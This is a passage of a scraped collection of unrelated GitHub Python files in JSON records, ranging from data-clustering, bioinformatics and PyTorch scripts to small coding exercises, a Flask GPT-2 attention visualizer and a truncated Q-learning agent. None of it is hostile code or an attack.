tags","repo_name":"tomasz-rebas/python-exif-file-renamer","sub_path":"exif_reader.py","file_name":"exif_reader.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25226826264","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport seaborn as sns\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.preprocessing import StandardScaler\nfrom kneed import KneeLocator\nimport shutil\nfrom PIL import Image\n\n\"\"\"\nThis script groups the images of the FAICC database according to their ratings of:\n- Valence\n- Arousal\nThese ratings will decide which images will be presented together for the 60second interval.\nThe FAICC database is a database comprising 301 images related to climate change.\nThe images were given ratings of valence, arousal and relevance by 106 participants.\nFor these ratings a 9-point Likert scale was used.\nArousal: 1 ==> calming feeling, 9 ==> exciting feeling\nValence: 1 ==> negative feeling, 9 ==> positive feeling \nRelevance: 1 ==> irrelevant to climate change, 9 ==> relevant to climate change.\nReference: Ottavi, S., Roussel, S. & Airelle, S. 2021, The French affective images of climate change (FAICC): A Dataset with Relevance and Affective Ratings, \n Frontiers in Psychology, 12. DOI=10.3389/fpsyg.2021.650650. \n\nIn our presentation, we focus on Valence and arousal as these descriptors were also used to construct the DEAP database.\n\"\"\"\n\ndef FindClustNum_elbow(fscaled):\n\n kmeans_kwargs = { \"init\": \"random\", \"n_init\": 10, \"max_iter\": 300, \"random_state\": 42 }\n # A list holds the SSE values for each k\n sse = []\n\n for k in range(1, 11):\n kmeans = KMeans(n_clusters=k, **kmeans_kwargs)\n kmeans.fit(fscaled)\n sse.append(kmeans.inertia_)\n\n plt.style.use(\"fivethirtyeight\")\n plt.plot(range(1, 11), sse)\n plt.xticks(range(1, 11))\n plt.xlabel(\"Number of Clusters\")\n plt.ylabel(\"SSE\")\n plt.show()\n\ndef image_save(dir_pics):\n Idir_contents = os.listdir((dir_pics))\n pjpg = [jpgcurr for jpgcurr in Idir_contents if '.jp' in jpgcurr]\n\n for pcnt, pcurr in enumerate(pjpg):\n currpath = os.path.join(dir_pics, pcurr)\n im = Image.open(currpath)\n pbis = pcurr.split('.')\n new_title = pbis[0]+'.png'\n im.save(os.path.join(dir_pics, new_title),\"PNG\")\n\ndata_path = '/Users/bolger/Documents/work/Projects/Visions_ClimateChange/FAICC_Database'\nfname = 'DataBase - FAICC.xlsx'\nfullpath = os.path.join(data_path, fname)\n\ndfIn = pd.read_excel(fullpath, sheet_name='Rating data')\nImageID = list(dfIn['Image ID'])\nArousal_mean = list(dfIn['Arousal Mean'])\nValence_mean = list(dfIn['Valence Mean'])\nRelevance_mean = list(dfIn['Relevance Mean'])\n\nArousal_mean = Arousal_mean[1:-1] # take out the beginning nan value\nValence_mean = Valence_mean[1:-1]\nRelevance_mean = Relevance_mean[1:-1]\nImageID = ImageID[1:-1]\n\nsns.displot(Arousal_mean)\nsns.displot(Valence_mean)\nsns.displot(Relevance_mean)\nsns.displot(x=Arousal_mean, y=Valence_mean)\n\n##%% Carry out Kmeans clustering of the images based on Arousal, Valence and Relevance features\n\nfeatures = np.transpose(np.vstack((Arousal_mean, Valence_mean, Relevance_mean)))\nscaler = StandardScaler()\nfeatures_scaled = scaler.fit_transform(features) # scale features values to have 0 mean and std =1\n\nFindClustNum_elbow(features_scaled)\n\nclusterN = 6\nkmeans = KMeans(init=\"random\", n_clusters=clusterN, n_init=10, max_iter=300, random_state=42)\nkmeans.fit(features_scaled)\n\n##% Scatter-plot of the features and the final centroids.\n\nfeature_class = kmeans.labels_\ncolors = ['red' if ft == 0 else 'green' if ft == 1 else 'blue' if ft == 2 else 'yellow' if ft == 3 else\n 'orange' if ft == 4 else'black' for ft in list(feature_class)]\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\nax.scatter(features_scaled[:,0], features_scaled[:,1], features_scaled[:,2], s=50, c=colors)\nax.set_xlabel('Mean Arousal')\nax.set_ylabel('Mean Valence')\nax.set_zlabel('Mean Relevance')\nplt.show()\n\n##%% Divide the images into cluster groups.\ndir_orig = '/Users/bolger/Documents/work/Projects/Visions_ClimateChange/FAICC_Database/Pictures'\ndiro_contents = os.listdir((dir_orig))\nclass_unique = np.unique(feature_class)\n\nfor classcurr in class_unique:\n CIndx = [classIndx for classIndx, ccurr in enumerate(feature_class) if ccurr==classcurr]\n Image_curr = [ImageID[index] for index in CIndx]\n dirname = 'Images_Class'+str(classcurr+1)\n newpath = os.path.join('../Image_classify/FAICC_Images', dirname)\n if not os.path.exists(newpath):\n os.makedirs(newpath)\n dir_dest = newpath\n\n # Files to move\n for fcount, Icurr in enumerate(Image_curr):\n x_png = str(int(Icurr))+'.png'\n pic2move = [piccur for piccur in diro_contents if x_png == piccur]\n if pic2move == []:\n print(f'Current image {x_png} does not exist.')\n else:\n old_file = os.path.join(dir_orig, pic2move[0])\n shutil.copy(old_file, dir_dest)\n\n\n","repo_name":"deebeebolger/VCC_Realtime_task","sub_path":"VCC_FAICC_image_analyse.py","file_name":"VCC_FAICC_image_analyse.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16604496725","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 25 15:19:12 2021\r\n\r\n@author: DELL\r\n\"\"\"\r\n\r\nx=input('Ingrese el # que contare ')\r\nx=int(x)\r\ny=1\r\nwhile y<=x:\r\n print(y)\r\n y+=1","repo_name":"edgarllano/Codigos-Python","sub_path":"14_while.py","file_name":"14_while.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30964986317","text":"from microbit import *\nimport radio\nimport random\ntime = 2400\nscore = 0\nmultiplier = 0\ncombo = 0\n#https://www.youtube.com/watch?v=fBGSJ3sbivI\nradio.on()\nradio.config(9)\n\n\ndef round(time, combo, multiplier,score):\n directions = {\"right\": Image.ARROW_E,\n \"for\": Image.ARROW_N,\n \"back\":Image.ARROW_S,\n \"left\":Image.ARROW_W}\n direction = [\"right\",\"left\",\"for\",\"back\"]\n game_won = False\n cur = random.choice(direction)\n display.show(directions[cur])\n start = running_time()\n end = running_time()\n \n \n while end-start < time:\n get = radio.receive()\n if type(get) is str:\n if get == cur:\n game_won = True\n combo += 1\n break\n end = running_time()\n \n #if time > 400:\n # time = int(time* 0.95)\n if combo >= 3:\n multiplier += 1\n combo = 0\n if game_won:\n score += multiplier \n else:\n multiplier = 1\n combo = 0\n return time,combo,multiplier,score\n \n\n\nwhile True:\n if button_a.was_pressed():\n s_start,s_end = running_time(),running_time()\n while s_end - s_start < 170000:\n time,combo,multiplier,score = round(time,combo,multiplier,score)\n display.clear()\n print(score)\n if button_b.was_pressed():\n s_end = s_start + 200000\n display.scroll(str(score),wait=True)\n display.show(Image.HEART)\n sleep(2000)\n display.show(Image.MUSIC_CROTCHET)\n s_end = running_time()\n display.show(Image.MUSIC_QUAVER)\n \n ","repo_name":"ncss/projects-2017-5","sub_path":"project-D/arrowrand MVP.py","file_name":"arrowrand MVP.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24935190009","text":"# Write a Python program to sum all the items in a list\n# Example sum_list([1,2,-8])\n# Return -5\n\ndef sum_list(a):\n sum = 0\n for i in a:\n sum = sum + i\n return sum\n\nprint(sum_list([1,2,-8]))\n \n \n","repo_name":"sanjidat/python-problems","sub_path":"List/sum_list.py","file_name":"sum_list.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39435898631","text":"from collections import deque\n\n\ndef process_molecule(starting_molecule, conversions, step):\n output_molecules = set()\n\n for atom in conversions:\n for swap in conversions[atom]:\n match = starting_molecule.find(atom)\n while match != -1:\n output_molecules.add((starting_molecule[:match] + swap + starting_molecule[match + len(atom):], step))\n match = starting_molecule.find(atom, match + 1)\n\n return output_molecules\n\n\ndef generate_molecules(length, conversions):\n found_molecules = deque(process_molecule(\"e\", conversions, 2))\n molecule_steps = {}\n while found_molecules:\n working_mol, w_step = found_molecules.popleft()\n mols = process_molecule(working_mol, conversions, w_step)\n for mol, step in mols:\n if len(mol) < length:\n found_molecules.append((mol, step + 1))\n elif len(mol) == length:\n if not molecule_steps.get(mol):\n molecule_steps[mol] = step\n else:\n molecule_steps[mol] = min(molecule_steps[mol], step)\n\n return molecule_steps\n\n\ninput_file = open(\"input.txt\", \"r\").read().split(\"\\n\")\n\nmolecule = input_file[-1]\ninput_file = input_file[:-1]\n\ntranslations = {}\n\nfor line in input_file:\n m_in, m_out = line.split(\" => \")\n if not translations.get(m_in):\n translations[m_in] = [m_out]\n else:\n translations[m_in].append(m_out)\n\n# molecule=\"HOHOHO\"\nsolution = generate_molecules(len(molecule), translations)\nprint(solution)\nprint(solution[molecule])\n","repo_name":"Kehvarl/adventofcode_2015","sub_path":"19.2-Medicine/Medicine.py","file_name":"Medicine.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10207929426","text":"def ensembl():\n E = {}\n inFile = open('HumanGTF-ids')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n E[fields[0]] = fields[1]\n inFile.close()\n return E\nensembl()\ndef expression(inF, inF2, ouF):\n E = ensembl()\n ouFile = open(ouF, 'w')\n D = {}\n G = []\n inFile = open(inF)\n heads = inFile.readline().strip().split('\\t')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n gene = fields[1].split('.')[0]\n G.append(gene)\n D[gene] = {}\n for i in range(4, len(heads)):\n D[gene][heads[i]] = fields[i]\n inFile.close()\n\n inFile = open(inF2)\n hds = inFile.readline().strip().split('\\t')\n sample = hds[10:]\n\n ouFile.write('GeneSymbol' +'\\t' + 'GeneID'+ '\\t' + '\\t'.join(sample) + '\\n')\n\n for g in G:\n L = []\n for s in sample:\n L.append(D[g].get(s,'-1'))\n\n ouFile.write(E.get(g,'NA') + '\\t' + g + '\\t' + '\\t'.join(L) + '\\n')\n \n \n inFile.close()\n ouFile.close()\n\n\nexpression('GD462.GeneQuantRPKM.50FN.samplename.resk10.txt', 'GEUVADIS.PH1PH2_465.IMPFRQFILT_BIALLELIC_PH.annotv2.genotypes-Genotype-stopgain-formated', 'GD462.GeneQuantRPKM.50FN.samplename.resk10.expression')\n","repo_name":"chw333/StanfordSGTC","sub_path":"NMD/02-1000Genome/465LCLs/06-gene-expression.py","file_name":"06-gene-expression.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42650817067","text":"import populate_integration\nimport pytest\n\n\n@pytest.mark.parametrize('expect_retval,rows', [\n (0, [{'id': 5}]),\n (1, [{'id': 2, 'extra': 'qqq'}])\n])\ndef test_failures_propagate_to_exit_code(expect_retval, rows, spark, mocker):\n mock_spark = mocker.MagicMock()\n mock_spark.createDataFrame.side_effect = spark.createDataFrame\n mock_spark.read.table.return_value = spark.range(0)\n\n # Avoid actual writes in spark, table doesnt exist anyways\n mocker.patch.object(populate_integration.HivePartitionWriter, 'overwrite_with')\n\n retval = populate_integration.main([\n (\n '/path/to/conf',\n {'partition': 'pytest/', 'rows': rows}\n ),\n ], mock_spark)\n assert retval == expect_retval\n\n\ndef test_type_mismatch_fails(spark, mocker):\n mock_spark = mocker.MagicMock()\n mock_spark.createDataFrame.side_effect = spark.createDataFrame\n mock_spark.read.table.return_value = spark.range(0)\n writer = mocker.MagicMock()\n\n try:\n populate_integration.import_rows(\n mock_spark, writer, [{'id': 'qqq'}])\n except TypeError as e:\n assert \"can not accept object 'qqq'\" in str(e), e\n else:\n assert False, \"Importing rows with mismatched types must throw TypeError\"\n","repo_name":"wikimedia/wikimedia-discovery-analytics","sub_path":"spark/test/test_populate_integration.py","file_name":"test_populate_integration.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37641396842","text":"from django.conf.urls import url\nfrom views import index, process, remove, delete, logout\napp_name=\"courses_app\"\nurlpatterns = [\n url(r'^$', index, name=\"index\"),\n url(r'^process$', process, name=\"process\"),\n url(r'^remove(?P\\d+)$', remove, name=\"remove\"),\n url(r'^delete/(?P\\d+)$', delete, name=\"delete\"),\n url(r'^logout$', logout, name=\"logout\"),\n # url(r'^dashboard$', dashboard, name=\"dashbaord\")\n]\n","repo_name":"LexiPearl/Python-Projects","sub_path":"myEnvironments/integration_project/apps/courses_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72080640107","text":"## process_request.py\n# Primary Owner: Cole Hoffele\n\nimport json\nimport standards\nimport prediction\nimport statistics\nimport jsonToSqlParms\n\nstat_op = {\"mean\":statistics.mean, \"median\":statistics.median, \"mode\":statistics.mode, \"stdev\":statistics.stdev, \"variance\":statistics.variance}\n\ndef sqlParmsToQuery(inputParms, dataInput):\n\n loadedJson = \"\"\n\n ###\n ### Load the Json request\n ###\n try:\n loadedJson = json.loads(dataInput)\n except:\n \treturn standards.InvalidJSON()\n\n query = AnalysisType(loadedJson, inputParms)\n return query\n\n\ndef AnalysisType(loadedJson, inputParms):\n\n operation = loadedJson['operation']\n\n if type(operation) == str and operation == 'lookup':\n return [\"SELECT * FROM pet WHERE \" + inputParms]\n elif str(operation) == \"correlation\":\n if 'X-axis' in loadedJson:\n if 'Y-axis' in loadedJson:\n if 'X-interval' in loadedJson:\n if 'Y-interval' in loadedJson:\n query = correlationType(loadedJson, inputParms)\n return [query]\n\n if type(operation) == type(list()):\n if operation[0] == \"lookup\":\n query = lookupType(loadedJson, inputParms)\n return query\n if(operation[0] == \"prediction\"):\n query = prediction.Predict(loadedJson, inputParms)\n return query\n else:\n return [\"SELECT * FROM pet\"]\n\n\n\ndef correlationType(loadedJson, inputParms):\n\n xAxis = loadedJson['X-axis']\n yAxis = loadedJson['Y-axis']\n xInterval = loadedJson['X-interval']\n if str(xInterval) == \"auto\":\n xInterval = 5\n yInterval = loadedJson['Y-interval']\n if str(yInterval) == \"auto\":\n yInterval = 5\n\n query = \"SELECT count(*) AS TOTAL,FLOOR(pet.\" + str(xAxis) + \"/\" + str(xInterval) + \") AS Interval FROM pet\"\n query = buildQuery(query, inputParms, \"Interval\", \"Interval\")\n\n return query\n\n\n\ndef lookupType(loadedJson, inputParms):\n\n operation = loadedJson['operation']\n query = []\n if operation[1] == \"percentage\":\n query.append(lookupPercentage(loadedJson, inputParms))\n elif operation[1] == \"average\":\n query.append(lookupAverage(loadedJson, inputParms))\n elif operation[1] in stat_op.keys():\n query.append(\"SELECT * FROM pet\")\n query.append(stat_op[operation[1]])\n query.append(list(loadedJson['field'].keys())[0])\n return query\n\n\ndef lookupPercentage(loadedJson, inputParms):\n\n if 'group by' in loadedJson:\n groupBy = loadedJson['group by']\n\n equation = \"((((pet.length/0.7062) - pet.height)/0.9156 ) - pet.height)\"\n\n if groupBy == \"bodyType\":\n query = \"SELECT (CAST((((count(*) *1.0) / ( SELECT (COUNT(*) * 1.0) FROM pet )) *100) AS DECIMAL(10,2))) as percentage, count(*) as Count, CASE WHEN \" + equation + \" <= 25 THEN 'Low' WHEN \" + equation + \" > 25 AND \" + equation + \" <= 35 THEN 'Moderate' WHEN \" + equation + \" > 35 AND \" + equation + \" <= 45 THEN 'High' WHEN \" + equation + \" > 45 AND \" + equation + \" <= 55 THEN 'Serious' WHEN \" + equation + \" > 55 AND \" + equation + \" <= 65 THEN 'Severe' WHEN \" + equation + \" > 65 THEN 'Extreme' END AS bodyType FROM pet\"\n\n query = buildQuery(query, inputParms, groupBy, None)\n\n return query\n\ndef lookupAverage(loadedJson, inputParms):\n if loadedJson['operation'][2] != '':\n\n averaged = \"AVG(\" + loadedJson['operation'][2] + \") as avg_\" + loadedJson['operation'][2]\n groupBy = loadedJson['group by']\n\n query = \"SELECT \" + groupBy + \", \" + averaged + \" FROM pet\"\n\n query = buildQuery(query, inputParms, groupBy, None)\n return query\n\n#Use this function after you build the \"SELECT\" part of the query, and nothing else.\ndef buildQuery(query, inputParms, groupBy, orderBy):\n\n if query != None:\n if inputParms != None:\n query = whereClause(query,inputParms)\n if groupBy != None:\n query = groupByClause(query, groupBy)\n if orderBy != None:\n query = orderByClause(query, orderBy)\n else:\n print(\"Query not valid\")\n\n return query\n\n\ndef groupByClause (query, groupBy):\n return query + \" GROUP BY \" + groupBy\n\ndef whereClause (query, inputParms):\n return query + \" WHERE \" + inputParms\n\ndef orderByClause (query, orderBy):\n return query + \" ORDER BY \" + orderBy\n\n\n\n\n\n\n#\n#SELECT CAST(field1 AS DECIMAL(10,2)) field1\n","repo_name":"DeborahStacey/ClinicalAnalysis","sub_path":"ClinicalAnalysisEngine/sqlParmsToQuery.py","file_name":"sqlParmsToQuery.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70804687147","text":"from sqlalchemy_data_models.country import Country\nfrom backend.src.lambda_libs.postgres.postgres_sqlalchemy_crud import (\n select,\n select_reference_table,\n)\nfrom json import dumps\nimport logging\n\n# Setup Logging\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\nlogger = logging.getLogger()\n\nentity_class = Country\n\n\ndef lambda_handler(event, context):\n print(event)\n\n if event[\"httpMethod\"] == \"GET\":\n query_params = event.get(\"queryStringParameters\", {})\n if query_params:\n return select(\n event,\n entity_class,\n entity_class.select_required_params,\n entity_class.all_params_select,\n )\n else:\n return select_reference_table(event, entity_class)\n else:\n method = event[\"httpMethod\"]\n message = f\"{method} method is not allowed\"\n description = f\"{message} on this resource\"\n error = {\n \"errorType\": \"InvalidHttpMethod\",\n \"errorMessage\": message,\n \"errorDescription\": description,\n }\n response = {\"statusCode\": 405, \"body\": dumps(error)}\n return response\n","repo_name":"linnla/OutcomesAI","sub_path":"backend/src/lambda_functions/reference_data/countries/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13627161592","text":"import torch\nimport torch.nn as nn\n\nclass ResBlock(nn.Module):\n def __init__(self,\n input_shape,\n kernel_size=(3,3),\n activation=nn.ReLU,\n acti_params = {'inplace': True},\n norm=nn.BatchNorm2d,\n bias=False,\n clip = False,\n clip_val=0):\n super().__init__()\n self.input_shape = input_shape\n self.kernel_size = kernel_size\n self.activation = activation\n self.acti_params = acti_params\n self.norm = norm\n self.clip = clip\n self.clip_val = clip_val\n\n self.channels = input_shape[0]\n self.stride = (1,1)\n pad = (kernel_size[0] -1 )//2\n self.padding = (pad, pad)\n self.stack = nn.Sequential()\n self.bias=bias\n self._build_stack()\n\n def _build_stack(self):\n\n self.stack.add_module('Conv-1',\n nn.Conv2d(self.channels, self.channels,\n kernel_size=self.kernel_size,\n stride=self.stride,\n padding=self.padding,\n bias=self.bias))\n\n self.stack.add_module('Norm-1',\n self.norm(self.channels))\n\n self.stack.add_module('Acti-1',\n self.activation(**self.acti_params))\n\n self.stack.add_module('Conv-2',\n nn.Conv2d(self.channels, self.channels,\n kernel_size=self.kernel_size,\n stride=self.stride,\n padding=self.padding,\n bias=self.bias))\n\n self.stack.add_module('Norm-2',\n self.norm(self.channels))\n\n def forward(self, x):\n out = self.stack(x)\n if self.clip:\n x = torch.clamp(x, -1, self.clip_val)\n return x + out\n return x + out\n\n\nclass ResBlocks(nn.Module):\n def __init__(self,\n input_shape,\n n_blocks=1,\n kernel_size=(3,3),\n activation=nn.ReLU,\n acti_params={},\n norm=nn.BatchNorm2d,\n clip=False,\n clip_val=0):\n\n super().__init__()\n\n self.input_shape = input_shape\n self.n_blocks = n_blocks\n self.kernel_size = kernel_size\n self.activation = activation\n self.acti_params = acti_params\n self.clip = clip\n self.clip_val = clip_val\n self.network = nn.Sequential()\n self._build_network()\n\n def _build_network(self):\n for i in range(self.n_blocks):\n\n self.network.add_module(\n 'res-{}'.format(i+1),\n ResBlock(self.input_shape, self.kernel_size, clip=self.clip,\n clip_val=self.clip_val,\n activation=self.activation,\n acti_params=self.acti_params))\n\n def forward(self, x):\n return self.network(x)\n\n","repo_name":"hyferg/painting-with-baryons","sub_path":"src/models/layers/residual.py","file_name":"residual.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36763773582","text":"# -----------------------------------------------------------\r\n# Given a string of numbers, you must perform a method in which you will translate this string into text, following the next image.\r\n# \r\n# for example if you get 22 you will b, if you get 222 you will return c. if you get 2222 return ca\r\n# \r\n# Here some samples:\r\n# \r\n# 443355555566604466690277733099966688 -> hello how are you., 55282 -> kata.\r\n# \r\n# 1 is used to separate letters with the same number.\r\n# \r\n# always transform the number to the letter with the maximum value, as long as it does not have a 1 in the middle.\r\n# \r\n# 777777 = \"sq\". 7717777 = \"qs\".\r\n# \r\n# you cant return numbers.\r\n# \r\n# 0 are spaces in the string.\r\n# \r\n# Given a empty string, return empty string.\r\n# \r\n# Return a lowercase string.\r\n# -----------------------------------------------------------\r\n\r\ndef phone_words(string_of_nums):\r\n if string_of_nums == \"\":\r\n return string_of_nums\r\n return string_of_nums.replace(\"9999\", \"z\")\\\r\n .replace(\"999\", \"y\").replace(\"99\", \"x\").replace(\"9\", \"w\")\\\r\n .replace(\"888\", \"v\").replace(\"88\", \"u\").replace(\"8\", \"t\")\\\r\n .replace(\"7777\", \"s\")\\\r\n .replace(\"777\", \"r\").replace(\"77\", \"q\").replace(\"7\", \"p\")\\\r\n .replace(\"666\", \"o\").replace(\"66\", \"n\").replace(\"6\", \"m\")\\\r\n .replace(\"555\", \"l\").replace(\"55\", \"k\").replace(\"5\", \"j\")\\\r\n .replace(\"444\", \"i\").replace(\"44\", \"h\").replace(\"4\", \"g\")\\\r\n .replace(\"333\", \"f\").replace(\"33\", \"e\").replace(\"3\", \"d\")\\\r\n .replace(\"222\", \"c\").replace(\"22\", \"b\").replace(\"2\", \"a\")\\\r\n .replace(\"1\", \"\").replace(\"0\", \" \")\r\n\r\n# -----------------------------------------------------------\r\n# License\r\n# Tasks are the property of Codewars (https://www.codewars.com/) \r\n# and users of this resource.\r\n# \r\n# All solution code in this repository \r\n# is the personal property of Vladimir Rukavishnikov\r\n# (vladimirrukavishnikovmail@gmail.com).\r\n# \r\n# Copyright (C) 2022 Vladimir Rukavishnikov\r\n# \r\n# This file is part of the HungryVovka/Codewars-Python\r\n# (https://github.com/HungryVovka/Codewars-Python)\r\n# \r\n# License is GNU General Public License v3.0\r\n# (https://github.com/HungryVovka/Codewars-Python/blob/main/LICENSE.md)\r\n# \r\n# You should have received a copy of the GNU General Public License v3.0\r\n# along with this code. If not, see http://www.gnu.org/licenses/\r\n# -----------------------------------------------------------","repo_name":"HungryVovka/Codewars-Python","sub_path":"6 kyu/PhoneWords.py","file_name":"PhoneWords.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8760537335","text":"import logging\n\nfrom flask import Blueprint, request\n\nfrom backend.blueprint import (\n get_current_user_handler,\n basic_carrier_result,\n)\nfrom backend.data.pagination_carrier import PaginationParams\nfrom backend.data.unit_of_work import SqlAlchemyUOW\nfrom backend.model.edit.master_organization_em import MasterOrganizationEm\nfrom backend.service.master_organization_service import (\n get_organization_list_for_management,\n create_or_update_master_organization,\n delete_organization_by_id,\n get_organization_selection,\n get_guest_login_organization_selection,\n)\nfrom backend.utility.route_premission_helper import RoutePermissionHelper\n\nmaster_organization_blueprint = Blueprint(\n name=\"master_organization\",\n import_name=__name__,\n url_prefix=\"/organization\",\n)\nroute_permission = RoutePermissionHelper(master_organization_blueprint, group=\"组织管理\")\n\n\n@master_organization_blueprint.route('/get-organization-management-list', methods=['POST'])\n@route_permission.set(name=\"获取列表\")\n@basic_carrier_result()\ndef route_get_list_for_management():\n data = request.get_json(silent=True)\n return get_organization_list_for_management(\n params=PaginationParams(**data)\n )\n\n\n@master_organization_blueprint.route('/create-or-update', methods=['POST'])\n@route_permission.set(name=\"编辑组织\")\n@basic_carrier_result()\ndef route_create_or_update_organization():\n data = request.get_json(silent=True)\n with SqlAlchemyUOW(\n handler=get_current_user_handler(),\n action=\"create-or-update-organization\",\n action_params=data,\n ) as uow:\n return create_or_update_master_organization(\n data=MasterOrganizationEm(**data),\n transaction=uow.transaction,\n )\n\n\n@master_organization_blueprint.route('/delete/', methods=['GET'])\n@route_permission.set(name=\"删除组织\")\n@basic_carrier_result()\ndef route_delete_organization(org_id: str):\n with SqlAlchemyUOW(\n handler=get_current_user_handler(),\n action=\"delete-organization\",\n action_params={\"id\": org_id},\n ) as uow:\n return delete_organization_by_id(\n organization_id=org_id,\n transaction=uow.transaction,\n )\n\n\n@master_organization_blueprint.route('/get-selection', methods=['POST'])\n@route_permission.set(name=\"获取选项列表\")\n@basic_carrier_result()\ndef route_get_organization_selection():\n params = request.get_json(silent=True)\n return get_organization_selection(params)\n\n\n@master_organization_blueprint.route('/guest-login-selection', methods=['GET'])\n@route_permission.set(name=\"访客登录组织选项列表\", login_required=False, allow_all=True)\n@basic_carrier_result()\ndef route_get_guest_login_organization_selection():\n return get_guest_login_organization_selection()\n","repo_name":"Philogag/The-Project-Demo","sub_path":"backend/blueprint/master_organization_blueprint.py","file_name":"master_organization_blueprint.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71926141547","text":"import matplotlib\nfrom flask import Flask, render_template, url_for, request, redirect, Markup\nfrom transformers import GPT2Model, GPT2Tokenizer, GPT2LMHeadModel\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport os\n\nmatplotlib.use('Agg')\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/generate_plot', methods=['POST'])\ndef generate_plot():\n model = GPT2Model.from_pretrained('gpt2', output_attentions=True)\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2')\n\n text = request.form['text']\n min_font_size = int(request.form['min_font_size'])\n max_font_size = int(request.form['max_font_size'])\n inputs = tokenizer.encode(text, return_tensors='pt')\n outputs = model(inputs)\n all_layer_attentions = outputs.attentions\n\n last_layer_attentions = all_layer_attentions[-1][0, 0, :, :].detach().numpy()\n tokens = tokenizer.tokenize(text)\n tokens = [token.replace('Ġ', '') for token in tokens]\n attention_text = generate_attention_text(\n tokens, last_layer_attentions, min_font_size, max_font_size)\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xlabel('Token Position')\n ax.set_ylabel('Layer')\n ax.set_zlabel('Attention Score')\n\n for i, layer_attention in enumerate(all_layer_attentions):\n layer_attention = layer_attention[0, 0, :, :].detach().numpy()\n X = np.arange(layer_attention.shape[0])\n Y = np.arange(layer_attention.shape[1])\n X, Y = np.meshgrid(Y, X)\n Z = layer_attention\n ax.plot_surface(X, Y, Z, cmap='coolwarm')\n\n ax.set_xticks(np.arange(len(tokens)))\n ax.set_xticklabels(tokens, rotation=90)\n\n plt.savefig(os.path.join('static', 'images', 'plot.png'))\n\n generation_model = GPT2LMHeadModel.from_pretrained('gpt2')\n generated_output = generation_model.generate(\n inputs, max_length=150, do_sample=True)\n generated_text = tokenizer.decode(\n generated_output[0], skip_special_tokens=True)\n\n return render_template('index.html', attention_text=attention_text, generated_text=generated_text)\n\n\ndef generate_attention_text(tokens, attentions, min_font_size=10, max_font_size=32):\n # Average attention scores over all heads\n avg_attention = np.mean(attentions, axis=0)\n min_val = np.min(avg_attention)\n max_val = np.max(avg_attention)\n norm_attentions = (avg_attention - min_val) / (max_val - min_val)\n\n # Scale font size by attention score. Range from min_font_size to max_font_size.\n scaled_font_sizes = min_font_size + \\\n (max_font_size - min_font_size) * norm_attentions\n attention_text = ''\n for token, font_size, attention in zip(tokens, scaled_font_sizes, norm_attentions):\n color_intensity = int(255 * attention)\n color = f'rgb({color_intensity}, 0, {255-color_intensity})'\n attention_text += f'{token} '\n\n return Markup(attention_text)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"yU-kiki/attention_visualization","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1481765958","text":"import gym\nimport math\nimport random\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n\nclass QAgent():\n def __init__(self, env, buckets=(3, 3, 6, 6,), min_alpha=0.1, min_epsilon=0.1, gamma=1.0, ada_divisor=20):\n self.env = env # for choosing different environments\n self.buckets = buckets # down-scaling feature space to discrete range\n self.min_alpha = min_alpha # learning rate\n self.min_epsilon = min_epsilon # exploration rate\n self.gamma = gamma # discount factor\n self.ada_divisor = ada_divisor # decay rate parameter for alpha and epsilon\n\n # initialising Q-table\n self.Q = np.zeros(self.buckets + (self.env.action_space.n,))\n\n # Discretizing input space to make Q-table and to reduce dimmensionality\n def discretize(self, state):\n 